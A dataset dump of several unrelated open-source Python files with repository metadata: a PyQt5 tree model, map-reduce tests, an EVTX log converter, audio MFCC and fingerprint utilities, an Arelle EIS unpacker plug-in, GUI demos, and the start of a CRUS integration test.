hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringdate 2015-01-01 00:00:47 2022-03-31 23:42:18 ⌀ | max_issues_repo_issues_event_max_datetime stringdate 2015-01-01 17:43:30 2022-03-31 23:59:58 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3a79851a367aea689a1293265d02727ae30bb330 | 7,877 | py | Python | cvstudio/view/widgets/common/treeview_model.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 32 | 2019-10-31T03:10:52.000Z | 2020-12-23T11:50:53.000Z | cvstudio/view/widgets/common/treeview_model.py | haruiz/CvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 19 | 2019-10-31T15:06:05.000Z | 2020-06-15T02:21:55.000Z | cvstudio/view/widgets/common/treeview_model.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 8 | 2019-10-31T03:32:50.000Z | 2020-07-17T20:47:37.000Z | import itertools
import typing
from typing import Any
from PyQt5 import QtCore
from PyQt5.QtCore import QModelIndex, pyqtSignal, QObject
from PyQt5.QtGui import QColor
from PyQt5.QtWidgets import QAbstractItemDelegate, QWidget, QStyleOptionViewItem, QSpinBox
class CustomNode(object):
    """A node in the tree displayed by CustomModel.

    *data* may be a list (one entry per column), a tuple (converted to a
    list) or a plain string (wrapped in a single-column list).
    *status* uses 1 for success; any other value selects the error icon
    and, for level-2 nodes, a red foreground in the model.
    """

    def __init__(self, data=None, success_icon=None, hover_icon=None, error_icon=None, level=-1, tag=None, status=1,
                 tooltip=None):
        self._data = data
        if isinstance(data, tuple):
            self._data = list(data)
        if isinstance(data, str):
            self._data = [data]
        self._tag = tag
        self._enable = False  # kept for compatibility; not read in this module
        self._success_icon = success_icon
        # Error/hover icons fall back to the success icon when not supplied.
        self._error_icon = error_icon if error_icon else success_icon
        self._hover_icon = hover_icon if hover_icon else success_icon
        self._children = []
        self._parent = None
        self._level = level
        self._row = 0  # index of this node within its parent's children
        self._status = status
        self._tooltip_content = tooltip

    def get_data(self, column):
        """Return the cell value for *column*, or None if out of range."""
        if 0 <= column < len(self._data):
            return self._data[column]

    def set_data(self, column, value):
        """Overwrite the cell value for *column* (the column must exist)."""
        self._data[column] = value

    def columnCount(self):
        """Number of data columns this node carries (0 for empty data)."""
        return len(self._data) if self._data else 0

    @property
    def tooltip_content(self):
        return self._tooltip_content

    @tooltip_content.setter
    def tooltip_content(self, value):
        self._tooltip_content = value

    @property
    def tag(self):
        """Arbitrary user payload attached to the node."""
        return self._tag

    @tag.setter
    def tag(self, val):
        self._tag = val

    @property
    def status(self):
        return self._status

    @status.setter
    def status(self, value):
        self._status = value

    @property
    def success_icon(self):
        return self._success_icon

    @success_icon.setter
    def success_icon(self, value):
        self._success_icon = value

    @property
    def error_icon(self):
        return self._error_icon

    @error_icon.setter
    def error_icon(self, value):
        self._error_icon = value

    @property
    def children(self):
        return self._children

    @children.setter
    def children(self, value):
        self._children = value

    @property
    def parent(self):
        return self._parent

    @parent.setter
    def parent(self, value):
        self._parent = value

    @property
    def level(self):
        return self._level

    @level.setter
    def level(self, value):
        self._level = value

    @property
    def row(self):
        return self._row

    @row.setter
    def row(self, value):
        self._row = value

    def child(self, index):
        """Return the child at *index*, or None if out of range."""
        if 0 <= index < len(self.children):
            return self.children[index]

    def addChild(self, child):
        """Append *child*, wiring its parent pointer and row index."""
        child._parent = self
        child._row = len(self.children)  # it becomes the last row
        self.children.append(child)

    def removeChild(self, position):
        """Detach the child at *position*; return True on success.

        Bug fix: the original used a strict ``position > len(...)`` bound,
        so ``position == len(children)`` slipped through and made
        ``list.pop`` raise IndexError instead of returning False.
        """
        if position < 0 or position >= len(self._children):
            return False
        child = self._children.pop(position)
        child._parent = None
        return True
class CustomModelSignals(QObject):
    """Signal container used by CustomModel.

    ``data_changed`` is emitted as (node, role, old_value, new_value)
    whenever a node's first column is edited through CustomModel.setData().
    """
    data_changed = pyqtSignal(CustomNode, int, str, str)
class WidgetDelegate(QAbstractItemDelegate):
    """Item delegate whose editor is a frameless spin box limited to 0-100."""

    def __init__(self):
        super(WidgetDelegate, self).__init__()

    def createEditor(self, parent: QWidget, option: QStyleOptionViewItem, index: QtCore.QModelIndex) -> QWidget:
        """Return the spin-box editor used for in-place cell editing."""
        spin_box = QSpinBox(parent)
        spin_box.setFrame(False)
        spin_box.setRange(0, 100)  # same bounds as setMinimum(0)/setMaximum(100)
        return spin_box
class CustomModel(QtCore.QAbstractItemModel):
    """Tree model over CustomNode items, for use with Qt item views.

    Column titles come from the *columns* list given at construction; the
    invisible root node is padded with one empty cell per column so
    columnCount() is correct before any rows exist.
    """

    def __init__(self, columns):
        QtCore.QAbstractItemModel.__init__(self)
        self._root = CustomNode(list(itertools.repeat("", len(columns))))
        self.signals = CustomModelSignals()
        self._columns = columns

    @property
    def root(self):
        """The invisible root CustomNode."""
        return self._root

    def headerData(self, section: int, orientation: QtCore.Qt.Orientation, role: int = ...) -> typing.Any:
        """Return the column title for the horizontal header."""
        if role == QtCore.Qt.DisplayRole:
            return self._columns[section]
        return super(CustomModel, self).headerData(section, orientation, role)

    def addChild(self, node, parent=None):
        """Attach *node* under *parent* (a QModelIndex), or under the root."""
        if not parent or not parent.isValid():
            parent = self._root
        else:
            parent = parent.internalPointer()
        parent.addChild(node)

    def setData(self, index: QModelIndex, value: Any, role=None):
        """Store *value* in column 0 of the edited node.

        Bug fix: also emits the Qt ``dataChanged`` signal (the original only
        emitted the custom signal, so attached views never repainted).
        NOTE: falsy values (e.g. the empty string) are rejected, as before.
        """
        if index.isValid():
            if role == QtCore.Qt.EditRole:
                node: CustomNode = index.internalPointer()
                if value:
                    old_val = node.get_data(0)
                    node.set_data(0, value)
                    self.signals.data_changed.emit(node, role, old_val, value)
                    self.dataChanged.emit(index, index)
                    return True
                else:
                    return False
        return False

    def removeChild(self, index: QModelIndex):
        """Remove the row addressed by *index*, notifying attached views."""
        self.beginRemoveRows(index.parent(), index.row(), index.row())
        success = self.removeRow(index.row(), parent=index.parent())
        self.endRemoveRows()
        return success

    def removeRow(self, row, parent):
        """Detach child *row* from the node addressed by *parent*."""
        if not parent.isValid():
            parentNode = self._root
        else:
            parentNode = parent.internalPointer()  # the node
        parentNode.removeChild(row)
        return True

    def data(self, index: QModelIndex, role=None):
        """Serve display text, status icon, text colour and tooltip per role."""
        if not index.isValid():
            return None
        node: CustomNode = index.internalPointer()
        if role == QtCore.Qt.DisplayRole:
            return node.get_data(index.column())
        elif role == QtCore.Qt.DecorationRole and index.column() == 0:
            # Icon mirrors node status: 1 == success, anything else == error.
            if node.status == 1:
                return node.success_icon
            else:
                return node.error_icon
        elif role == QtCore.Qt.TextColorRole:
            # Failed (-1) level-2 entries are painted red.
            if node.level == 2 and node.status == -1:
                return QColor(255, 0, 0)
        elif role == QtCore.Qt.ToolTipRole:
            return node.tooltip_content
        return None

    def flags(self, index: QModelIndex):
        """All valid indexes are editable (plus the default view flags)."""
        if not index.isValid():
            return QtCore.Qt.NoItemFlags
        return super(CustomModel, self).flags(index) | QtCore.Qt.ItemIsEditable

    def rowCount(self, parent: QModelIndex = None, *args, **kwargs):
        # Bug fix: guard the None default -- the original called
        # parent.isValid() unconditionally and crashed on rowCount().
        if parent is not None and parent.isValid():  # internal nodes
            child: CustomNode = parent.internalPointer()
            return len(child.children)
        return len(self._root.children)  # first level nodes

    def columnCount(self, parent: QModelIndex = None, *args, **kwargs):
        if parent is not None and parent.isValid():
            return parent.internalPointer().columnCount()
        return self._root.columnCount()

    def parent(self, in_index: QModelIndex = None):
        if in_index is not None and in_index.isValid():
            parent = in_index.internalPointer().parent
            if parent:
                return self.createIndex(parent.row, 0, parent)
        return QtCore.QModelIndex()

    def index(self, row: int, column: int, parent=None, *args, **kwargs):
        if not parent or not parent.isValid():
            parent_node = self._root
            parent = QtCore.QModelIndex()  # hasIndex() requires a real index
        else:
            parent_node = parent.internalPointer()
        if not self.hasIndex(row, column, parent):
            return QtCore.QModelIndex()
        child = parent_node.child(row)
        if child:
            return self.createIndex(row, column, child)
        return QtCore.QModelIndex()
| 30.296154 | 116 | 0.612416 |
3a7af5581758219d8326f2091b7b6047cf305d66 | 1,761 | py | Python | pyrallel/tests/test_map_reduce.py | usc-isi-i2/paralyzer | 2991e9e74f17e35d8c7d9f86d57c5c7f7a311915 | [
"MIT"
] | 13 | 2019-07-02T22:41:46.000Z | 2022-02-20T13:30:00.000Z | pyrallel/tests/test_map_reduce.py | usc-isi-i2/paralyzer | 2991e9e74f17e35d8c7d9f86d57c5c7f7a311915 | [
"MIT"
] | 14 | 2019-07-03T18:04:25.000Z | 2021-05-20T20:45:33.000Z | pyrallel/tests/test_map_reduce.py | usc-isi-i2/paralyzer | 2991e9e74f17e35d8c7d9f86d57c5c7f7a311915 | [
"MIT"
] | 3 | 2020-02-12T21:54:17.000Z | 2020-08-24T20:41:18.000Z | import multiprocessing as mp
from pyrallel.map_reduce import MapReduce
NUM_OF_PROCESSOR = max(2, int(mp.cpu_count() / 2))
def test_map_reduce_number():
    """Sum the integers 1..upper through MapReduce and check the totals."""
    def identity(x):
        return x

    def add(left, right):
        return left + right

    # (worker count, upper bound of the 1..upper task range, expected sum)
    scenarios = [
        (3, 1, 1),
        (NUM_OF_PROCESSOR, 1, 1),
        (1, 100, 5050),
        (NUM_OF_PROCESSOR, 100, 5050),
        (NUM_OF_PROCESSOR, 100000, 5000050000),
    ]
    for workers, upper, expected in scenarios:
        mr = MapReduce(workers, identity, add)
        mr.start()
        for value in range(1, upper + 1):
            mr.add_task(value)
        mr.task_done()
        assert mr.join() == expected
def test_map_reduce_object():
    """Aggregate {key: count} dicts through MapReduce and check the merge."""
    def wrap(k, v):
        return {k: v}

    def merge(left, right):
        for key, val in left.items():
            if key in right:
                right[key] += val
            else:
                right[key] = val
        return right

    # Even values of 0..99 go to 'a' (sum 2450), odd values to 'b' (sum 2500).
    for workers in (1, NUM_OF_PROCESSOR):
        mr = MapReduce(workers, wrap, merge)
        mr.start()
        for i in range(100):
            mr.add_task('a' if i % 2 == 0 else 'b', i)
        mr.task_done()
        assert mr.join() == {'a': 2450, 'b': 2500}
3a7bafa3c7ab3354d60a1fcd0376c7ade47cb21d | 707 | py | Python | evtx_to_dataframe.py | esua/evtx_to_dataframe | 390bf470e92092e66827373ed7e8b012a4fe94f6 | [
"Apache-2.0"
] | null | null | null | evtx_to_dataframe.py | esua/evtx_to_dataframe | 390bf470e92092e66827373ed7e8b012a4fe94f6 | [
"Apache-2.0"
] | null | null | null | evtx_to_dataframe.py | esua/evtx_to_dataframe | 390bf470e92092e66827373ed7e8b012a4fe94f6 | [
"Apache-2.0"
] | null | null | null | import argparse
import Evtx.Evtx as evtx
import pandas as pd
import xmltodict
import re
parser = argparse.ArgumentParser(description="Convert Windows EVTX event log file to DataFrame.")
parser.add_argument("evtx", type=str, help="Path to the Windows EVTX event log file")
args = parser.parse_args()

# Turn <Data Name="X">v</Data> elements into <X>v</X> so xmltodict yields one
# key per EventData field instead of a list of anonymous Data entries.
_DATA_ELEMENT = re.compile(r'<Data Name="(.+)">(.+)</Data>')

with evtx.Evtx(args.evtx) as log:
    records = [
        xmltodict.parse(_DATA_ELEMENT.sub(r'<\1>\2</\1>', record.xml()))
        for record in log.records()
    ]

df = pd.json_normalize(records)  # one DataFrame row per event record
print(df)
| 33.666667 | 110 | 0.693069 |
3a7bc36048999e619539f1b4ea6519f544722e26 | 562 | py | Python | test/sandwich.py | DynamicCai/Dynamic-Explorer | c909206b3db52f76f23499b1cb43520d3475b14e | [
"MIT"
] | null | null | null | test/sandwich.py | DynamicCai/Dynamic-Explorer | c909206b3db52f76f23499b1cb43520d3475b14e | [
"MIT"
] | null | null | null | test/sandwich.py | DynamicCai/Dynamic-Explorer | c909206b3db52f76f23499b1cb43520d3475b14e | [
"MIT"
] | null | null | null |
# Menu data for a simple sandwich-ordering script.
# Meat/extra entries map a menu number to {item name: price}; 'none' is free.
sandwich_meat = {
    1: {'chicken': 3},
    2: {'beef': 5},
    3: {'pork': 4},
    4: {'bacon': 4},
    5: {'sausage': 4},
    6: {'omelette': 2},
    7: {'none': 0},
}
sandwich_sauce = ['mayonnaise', 'ketchup', 'yellow mustard', 'black pepper sauce', 'cheese', 'none']
sandwich_vegetable = ['lettuce', 'sliced tomatoes', 'sliced pickles', 'potato salad', 'red cabbage', 'none']
sandwich_extra = {
    1: {'extra cheese': 3},
    2: {'extra pickles': 1},
    3: {'double meat': 'X2'},
    4: {'none': 0},
}
# Bug fix: the original read `ordered_dish={'m7eat':}` -- a syntax error
# (a key with no value) that stopped the whole file from parsing.
# NOTE(review): presumably this dict was meant to collect the customer's
# selections; initialised empty here -- confirm the intended structure.
ordered_dish = {}
print('meat', 'sauce', 'vegetable', 'extra')
| 18.733333 | 101 | 0.565836 |
3a7c85d6a1879df3d91cd853104103d5c1ce8afa | 1,553 | py | Python | paprotka/feature/cepstral.py | michalsosn/paprotka | d6079eefbade2cb8be5896777a7d50ac968d42ec | [
"MIT"
] | 1 | 2019-10-29T04:14:40.000Z | 2019-10-29T04:14:40.000Z | paprotka/feature/cepstral.py | michalsosn/paprotka | d6079eefbade2cb8be5896777a7d50ac968d42ec | [
"MIT"
] | null | null | null | paprotka/feature/cepstral.py | michalsosn/paprotka | d6079eefbade2cb8be5896777a7d50ac968d42ec | [
"MIT"
] | null | null | null | import math
import numpy as np
from scipy import signal, fftpack
def pre_emphasize(data, pre_emphasis=0.97):
    """First-order pre-emphasis filter: y[0] = x[0], y[t] = x[t] - a*x[t-1]."""
    emphasized_tail = data[1:] - pre_emphasis * data[:-1]
    return np.concatenate(([data[0]], emphasized_tail))
def hz_to_mel(hz):
    """Convert a frequency in Hz to the mel scale."""
    ratio = hz / 700
    return math.log10(ratio + 1) * 2595
def mel_to_hz(mel):
    """Inverse of hz_to_mel: convert a mel value back to Hz."""
    return (10 ** (mel / 2595) - 1) * 700
def make_mel_filters(half, rate, filter_num):
    """Build a (filter_num, half) bank of triangular mel-spaced filters.

    Centre frequencies are spaced uniformly on the mel scale between 0 Hz
    and the Nyquist frequency, then mapped onto FFT bin indices.
    """
    mel_lo, mel_hi = 0, hz_to_mel(rate / 2)
    hz_points = mel_to_hz(np.linspace(mel_lo, mel_hi, filter_num + 2))
    bins = np.floor((2 * half + 1) * hz_points / rate).astype(np.int32)
    bank = np.zeros((filter_num, half))
    # Each filter rises linearly from bins[i] to bins[i+1], then falls to bins[i+2].
    for row, (lo, peak, hi) in enumerate(zip(bins, bins[1:], bins[2:])):
        bank[row, lo:peak] = np.linspace(0, 1, peak - lo, endpoint=False)
        bank[row, peak:hi] = np.linspace(1, 0, hi - peak, endpoint=True)
    return bank
def calculate_filter_bank(sound, filter_num=30, result_scaling=np.log1p, *args, **kwargs):
    """Compute mel filter-bank features for *sound* (needs .data and .rate).

    Returns an array of shape (frames, filter_num), scaled by
    *result_scaling* (log1p by default). Extra arguments go to signal.stft.
    """
    freqs, _times, spectrum = signal.stft(sound.data, sound.rate, *args, **kwargs)
    power = np.abs(spectrum) ** 2
    mel_bank = make_mel_filters(freqs.size, sound.rate, filter_num)
    return result_scaling((mel_bank @ power).T)
def calculate_mfcc(sound, num_ceps=12, *args, **kwargs):
    """Compute MFCCs: a DCT over the log mel filter-bank energies.

    With num_ceps=None the full DCT is returned; otherwise coefficients
    1..num_ceps are kept (coefficient 0 is dropped, as is conventional).
    """
    mfcc = fftpack.dct(calculate_filter_bank(sound, *args, **kwargs), norm='ortho')
    return mfcc if num_ceps is None else mfcc[:, 1:(num_ceps + 1)]
3a7d8a539d82fbecac85da845cd748fe400b1a12 | 2,688 | py | Python | arelle/plugin/unpackSecEisFile.py | DataFinnovation/Arelle | d4bf45f56fc9249f75ab22e6217dbe55f0510841 | [
"Apache-2.0"
] | 292 | 2015-01-27T03:31:51.000Z | 2022-03-26T07:00:05.000Z | arelle/plugin/unpackSecEisFile.py | DataFinnovation/Arelle | d4bf45f56fc9249f75ab22e6217dbe55f0510841 | [
"Apache-2.0"
] | 94 | 2015-04-18T23:03:00.000Z | 2022-03-28T17:24:55.000Z | arelle/plugin/unpackSecEisFile.py | DataFinnovation/Arelle | d4bf45f56fc9249f75ab22e6217dbe55f0510841 | [
"Apache-2.0"
] | 200 | 2015-01-13T03:55:47.000Z | 2022-03-29T12:38:56.000Z | '''
Unpack SEC EIS File is an example of a plug-in to the GUI menu
that will save the unpacked contents of an SEC EIS File in a directory.
(c) Copyright 2012 Mark V Systems Limited, All rights reserved.
'''
def unpackEIS(cntlr, eisFile, unpackToDir):
    """Extract every member of an SEC EIS archive into *unpackToDir*.

    cntlr       -- the Arelle controller (file access and logging)
    eisFile     -- path to the compressed (.eis) or XML EIS archive
    unpackToDir -- existing directory that receives the unpacked files
    """
    from arelle.FileSource import openFileSource
    # checkIfXmlIsEis lets a plain-XML EIS file be treated as an archive too.
    filesource = openFileSource(eisFile, cntlr, checkIfXmlIsEis=True)
    if not filesource.isArchive:
        cntlr.addToLog("[info:unpackEIS] Not recognized as an EIS file: " + eisFile)
        return
    import os, io  # NOTE(review): io is imported but unused here
    unpackedFiles = []
    for file in filesource.dir:
        # filesource.file() returns (file object, encoding) for each member.
        fIn, encoding = filesource.file(os.path.join(eisFile,file))
        # NOTE(review): members are rewritten as text in the reported
        # encoding -- presumably EIS members are always textual; confirm.
        with open(os.path.join(unpackToDir, file), "w", encoding=encoding) as fOut:
            fOut.write(fIn.read())
        unpackedFiles.append(file)
        fIn.close()
    cntlr.addToLog("[info:unpackEIS] Unpacked files " + ', '.join(unpackedFiles))
def unpackSecEisMenuEntender(cntlr, menu, *args, **kwargs):
    """Add an "Unpack SEC EIS File" entry to Arelle's Tools menu.

    cntlr -- the Arelle GUI controller (config, dialogs, logging)
    menu  -- the Tools menu being extended
    """
    def askUnpackDirectory():
        # Prompt for the EIS archive, starting in the last-used directory.
        eisFile = cntlr.uiFileDialog("open",
                title=_("arelle - Open SEC EIS file"),
                initialdir=cntlr.config.setdefault("openSecEisFileDir","."),
                filetypes=[(_("Compressed EIS file .eis"), "*.eis"), (_("Uncompressed EIS file .xml"), "*.xml")],
                defaultextension=".eis")
        if not eisFile:
            return
        from tkinter.filedialog import askdirectory
        # Ask where to put the unpacked contents.
        unpackToDir = askdirectory(parent=cntlr.parent,
                                   initialdir=cntlr.config.setdefault("unpackSecEisFileDir","."),
                                   title='Please select a directory for unpacked EIS Contents')
        import os
        # Persist both chosen locations so the next invocation starts there.
        cntlr.config["openSecEisFileDir"] = os.path.dirname(eisFile)
        cntlr.config["unpackSecEisFileDir"] = unpackToDir
        cntlr.saveConfig()
        try:
            unpackEIS(cntlr, eisFile, unpackToDir)
        except Exception as ex:
            # Report rather than crash the GUI on any unpack failure.
            cntlr.addToLog("[arelle:exception] Unpack EIS exception: " + str(ex));
    menu.add_command(label="Unpack SEC EIS File",
                     underline=0,
                     command=lambda: askUnpackDirectory() )
# Arelle plug-in registration record: Arelle reads this dict to discover the
# plug-in's metadata and the GUI menu hook declared below.
__pluginInfo__ = {
    'name': 'Unpack SEC EIS File',
    'version': '0.9',
    'description': "This plug-in unpacks the contents of an SEC EIS file.",
    'license': 'Apache-2',
    'author': 'Mark V Systems Limited',
    'copyright': '(c) Copyright 2012 Mark V Systems Limited, All rights reserved.',
    # classes of mount points (required)
    'CntlrWinMain.Menu.Tools': unpackSecEisMenuEntender,
}
| 43.354839 | 134 | 0.604911 |
3a7e02c43c6ebf2859a5eb96f826707b1b0a7b33 | 2,251 | py | Python | fpcalc.py | johnlawsharrison/pyacoustid | 55321b316f09e782a1c0914826419be799908e01 | [
"MIT"
] | 203 | 2016-01-18T14:05:49.000Z | 2022-03-25T04:04:42.000Z | fpcalc.py | johnlawsharrison/pyacoustid | 55321b316f09e782a1c0914826419be799908e01 | [
"MIT"
] | 41 | 2016-03-08T10:28:14.000Z | 2021-11-26T20:53:15.000Z | fpcalc.py | johnlawsharrison/pyacoustid | 55321b316f09e782a1c0914826419be799908e01 | [
"MIT"
] | 56 | 2016-01-09T04:22:40.000Z | 2022-01-29T16:01:39.000Z | #!/usr/bin/env python
# This file is part of pyacoustid.
# Copyright 2012, Lukas Lalinsky.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Simple script for calculating audio fingerprints, using the same
arguments/output as the fpcalc utility from Chromaprint."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import argparse
import sys
import acoustid
import chromaprint
def main():
    """Fingerprint each file named on the command line, printing results in
    the same FILE/DURATION/FINGERPRINT format as Chromaprint's fpcalc."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-length', metavar='SECS', type=int, default=120,
                        help='length of the audio data used for fingerprint '
                             'calculation (default 120)')
    parser.add_argument('-raw', action='store_true',
                        help='output the raw uncompressed fingerprint')
    parser.add_argument('paths', metavar='FILE', nargs='+',
                        help='audio file to be fingerprinted')
    args = parser.parse_args()

    # make gst not try to parse the args
    del sys.argv[1:]

    first = True
    for path in args.paths:
        try:
            duration, fp = acoustid.fingerprint_file(path, args.length)
        except Exception:
            print("ERROR: unable to calculate fingerprint "
                  "for file %s, skipping" % path, file=sys.stderr)
            continue

        if args.raw:
            raw_fp = chromaprint.decode_fingerprint(fp)[0]
            fp = ','.join(map(str, raw_fp))
        else:
            # Bug fix: fingerprint_file returns bytes; decode only on the
            # non-raw path (the original decoded unconditionally at print
            # time, raising AttributeError when -raw had turned fp into str).
            fp = fp.decode('utf8')

        if not first:
            # Bug fix: the original had a bare `print` (the function object,
            # never called), so no blank line separated successive files.
            print()
        first = False

        print('FILE=%s' % path)
        print('DURATION=%d' % duration)
        print('FINGERPRINT=%s' % fp)


if __name__ == '__main__':
    main()
| 34.106061 | 77 | 0.660595 |
3a7e4975152b719956030d04fd87b6aff71f9b39 | 203 | py | Python | app/views/dashboard/leadership/__init__.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/dashboard/leadership/__init__.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/dashboard/leadership/__init__.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | from app.views.dashboard.leadership.index import leaderships
from app.views.dashboard.leadership.delete import leadership_delete
from app.views.dashboard.leadership.activation import leadership_activated | 67.666667 | 74 | 0.8867 |
3a7ec9858eb7869bba6e4129ded3a123b302b0e2 | 3,071 | py | Python | Learning/button groups.py | atharva0300/PyQt5-Practice | 0feacca6518190646a345ce2ea75e071e7861ac5 | [
"MIT"
] | null | null | null | Learning/button groups.py | atharva0300/PyQt5-Practice | 0feacca6518190646a345ce2ea75e071e7861ac5 | [
"MIT"
] | null | null | null | Learning/button groups.py | atharva0300/PyQt5-Practice | 0feacca6518190646a345ce2ea75e071e7861ac5 | [
"MIT"
] | 1 | 2021-11-16T10:18:07.000Z | 2021-11-16T10:18:07.000Z | # Button Groups in Python
import PyQt5
from PyQt5.QtWidgets import QApplication, QHBoxLayout, QLabel, QButtonGroup, QMainWindow, QDialog, QPushButton, QVBoxLayout
import sys
from PyQt5 import QtGui
from PyQt5.QtGui import QFont, QPixmap
from PyQt5.QtCore import QSize
class window(QDialog):
    """Demo dialog: a QButtonGroup of three language buttons plus a label
    reporting which button was last clicked."""

    def __init__(self):
        super().__init__()
        self.title = 'PyQt5 Widow '
        self.left = 500
        self.top = 200
        self.width = 300
        self.height = 250
        self.iconName = './icons/file.png'
        # Build window chrome, button group and buttons.
        self.initwindow()
        # Status label sits after the buttons in the same row.
        self.label = QLabel('Hello')
        self.label.setFont(QtGui.QFont('Sanserif', 13))
        self.hbox.addWidget(self.label)
        self.setLayout(self.hbox)
        # (The original also called on_Pressed() here; with the fixed slot
        # signature that call is a no-op, so it is dropped.)
        self.show()

    def initwindow(self):
        """Create the layout, the button group and its three buttons."""
        self.setWindowIcon(QtGui.QIcon('./icons/file.png'))
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        self.hbox = QHBoxLayout()
        self.buttongroup = QButtonGroup()
        # buttonClicked[int] delivers the id registered via addButton().
        self.buttongroup.buttonClicked[int].connect(self.on_Pressed)
        self.button1 = self._add_button('Python', './icons/python.png', 1)
        self.button2 = self._add_button('C++', './icons/cpp.png', 2)
        self.button3 = self._add_button('Java', './icons/java.png', 3)

    def _add_button(self, text, icon_path, button_id):
        """Create one push button, register it in the group and the layout."""
        button = QPushButton(text)
        self.buttongroup.addButton(button, button_id)
        button.setIcon(QtGui.QIcon(icon_path))
        button.setIconSize(QSize(40, 40))
        self.hbox.addWidget(button)
        return button

    def on_Pressed(self, button_id=None):
        """Slot for buttonClicked[int]: show which button was pressed.

        Bug fixes vs. the original: the slot now accepts the id emitted by
        the signal (the original took no argument, so every click raised a
        TypeError), and it looks the button up by that id instead of
        passing the *builtin* ``id`` function to buttongroup.button().
        """
        if button_id is None:
            return
        clicked = self.buttongroup.button(button_id)
        if clicked is not None:
            self.label.setText(clicked.text() + ' Was clicked')
if __name__ == "__main__":
    app = QApplication(sys.argv)
    # Bug fix: the original wrote `window = window()`, rebinding the name and
    # shadowing the class with its own instance; use a distinct variable.
    main_window = window()
    sys.exit(app.exec())
| 28.700935 | 124 | 0.581895 |
3a7f65074a8ce42ce2f4be7f8b8b5034567b834f | 20,126 | py | Python | ct-tests/lib/crus_integration_test.py | Cray-HPE/cray-crus | 6643aa3eb3debe5cbe0088f6a30b7e56ca1b1f17 | [
"MIT"
] | null | null | null | ct-tests/lib/crus_integration_test.py | Cray-HPE/cray-crus | 6643aa3eb3debe5cbe0088f6a30b7e56ca1b1f17 | [
"MIT"
] | 1 | 2022-03-02T21:06:21.000Z | 2022-03-04T17:32:14.000Z | ct-tests/lib/crus_integration_test.py | Cray-HPE/cray-crus | 6643aa3eb3debe5cbe0088f6a30b7e56ca1b1f17 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# MIT License
#
# (C) Copyright 2020-2022 Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
"""
CRUS integration test
See crus_integration_test/argparse.py for command line usage.
### SETUP ###
1 Generate map of xnames, nids, and hostnames for target nodes (by default,
all computes)
2 Validate they work with the specified min/max node and step values.
3 Lookup BOS session template
4 Create empty starting, upgrading, and failed HSM groups
5 Create new session template for all target nodes
6 Create new session templates for the upgrading group
7 Use BOS to reboot all target nodes to new BOS session template
### TEST 1 ###
8 Put 1 node into starting group
9 Create CRUS session
10 Verify all goes well & delete CRUS session
### TEST 2 ###
11 Move all nodes into starting group.
Repeat steps 9-10, with step size that results in at least 2 steps
### TEST 3 ###
12 Select 2 nodes
13 Start slurm workload on 1 of them
14 Create CRUS session
15 Verify that CRUS waits while the slurm workloads run
16 Stop the slurm workloads
17 Verify that all goes well & delete CRUS session
### RESTORE NODES ###
18 Create CRUS session to reboot all nodes to base slurm template
19 Verify that all goes well & delete CRUS session
### CLEANUP ###
20 Delete new templates
21 Delete custom vcs branches
22 Delete new hsm groups
"""
from crus_integration_test.argparse import parse_args
